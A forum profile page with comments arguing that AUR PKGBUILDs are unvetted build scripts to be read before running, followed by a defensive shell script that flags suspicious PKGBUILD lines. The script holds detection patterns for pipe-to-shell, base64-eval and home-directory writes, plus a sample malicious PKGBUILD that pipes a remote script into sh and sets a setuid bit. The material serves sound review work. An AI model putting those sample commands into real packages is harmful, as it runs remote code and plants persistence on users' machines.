• 0 posts
  • 5 comments
Joined 3 years ago
Cake day: June 6th, 2023
  • The AUR should not be thought of as a package manager repo. It should be thought of as a pastebin for pkgbuild scripts, i.e. build instructions. Running them without looking is the equivalent of blindly copying shell commands from stackoverflow.

    If you are thinking “I want to install this package I found, it doesn’t exist in any repo, but their build instructions are complex and don’t have instructions for arch,” a pkgbuild is a great resource. At the very least you can read someone’s pkgbuild to see what dependencies and build steps worked for them (in the same way that you can dissect a shell script line-by-line to understand what it’s doing).

    The only official way to use the AUR is to manually download a pkgbuild file and manually run makepkg to execute it. All the other tools that turn it into a convenient repo source (e.g. yay, paru, pamac) are unofficial.

  • Does anyone know if yay gives me the ability to hook my own tool in to review pkgbuilds before accepting them? They argue that they don’t want to just give attackers access to a scanning tool, because all they’d do is just iterate on their pkgbuild until it reports “not detected”. But if yay gives me an easy way to hook in whatever tool I want, the attacker can’t be sure what tool to defeat. If thousands of people all run various tools, surely a few of them will spot the anomaly quickly.

    Edit: it looks like they’ve added this exact functionality in response to the attacks: https://jguer.space/blog/2026-06-15-yay-v13
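Added example, not from either commenter and not yay's hook mechanism: a small POSIX shell pre-review script of the kind one might run over a downloaded PKGBUILD before makepkg (or plug into whatever hook a helper offers). The heuristics, tags and the two embedded sample PKGBUILDs are constructed assumptions so it runs offline; it only reads the file and prints findings.

```shell
#!/bin/sh
# Heuristic pre-review of a PKGBUILD before handing it to makepkg (constructed example).
# Nothing is built or run: each check only prints "tag file:line: text" for a matching line.
flag() {  # flag TAG ERE FILE. "|| true" keeps a no-match (grep exit 1) from tripping set -e.
    grep -nE "$2" "$3" | sed "s|^|$1 $3:|" || true
}
list_sources() {  # entries of source=(...) arrays, one per line, quotes stripped, multi-line ok
    awk '/^source(_[A-Za-z0-9_]+)?=\(/ { inarr = 1; sub(/^[^(]*\(/, "") }
         inarr { if (sub(/\).*/, "")) inarr = 0; for (i = 1; i <= NF; i++) print $i }' "$1" |
        tr -d "\"'"
}
review_pkgbuild() {
    f="$1"
    # 1. Download piped straight into a shell: the executed code never lands on disk to be read.
    flag "[pipe-to-shell]" '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$f"
    # 2. Obfuscation: what a base64 blob or eval string actually runs is not visible in the text.
    flag "[obfuscation]" '(base64[[:space:]]+(-d|--decode)|(^|[[:space:];&|])eval[[:space:]])' "$f"
    # 3. Escalation: a build never needs sudo, and setuid/setgid bits deserve a deliberate look.
    flag "[escalation]" '(sudo[[:space:]]|chmod.*([+]s|[[:space:]][2-7][0-7]{3}))' "$f"
    # 4. Writes into the builder's home instead of $srcdir/$pkgdir (persistence, key theft).
    flag "[home-write]" '(\$HOME|~)/\.?(ssh|bashrc|profile|config|local)' "$f"
    # 5. Plain-http sources can be swapped in transit; a SKIP checksum would not catch that.
    list_sources "$f" | grep -E '(^|::)http://' | sed "s|^|[plain-http] $f: source |" || true
}
count_findings() { review_pkgbuild "$1" | grep -c . || true; }   # "0" when nothing was flagged

# Constructed sample PKGBUILDs (not real AUR packages) so the script runs offline.
SUSPECT=$(mktemp); CLEAN=$(mktemp); trap 'rm -f "$SUSPECT" "$CLEAN"' EXIT
cat >"$SUSPECT" <<'EOF'
pkgname=example-tool
source=("http://mirror.example/example-tool-1.0.0.tar.gz"
        "helper.sh")
sha256sums=('SKIP' 'SKIP')
build() {
  curl -fsSL https://cdn.example/setup.sh | sh
  echo 'ZWNobyBoaQo=' | base64 -d | sh
}
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  cp helper.sh "$HOME/.config/autostart.sh"
  sudo chmod 4755 "$pkgdir/usr/bin/example-tool"
}
EOF
cat >"$CLEAN" <<'EOF'
pkgname=example-tool
source=("https://mirror.example/example-tool-1.0.0.tar.gz")
sha256sums=('SKIP')
package() { install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"; }
EOF
review_pkgbuild "$SUSPECT"   # prints five findings; review_pkgbuild "$CLEAN" prints nothing
```

A hit is a prompt to read that line, not a verdict: the point of the thread is that the reviewer, not the pattern list, decides whether to run makepkg.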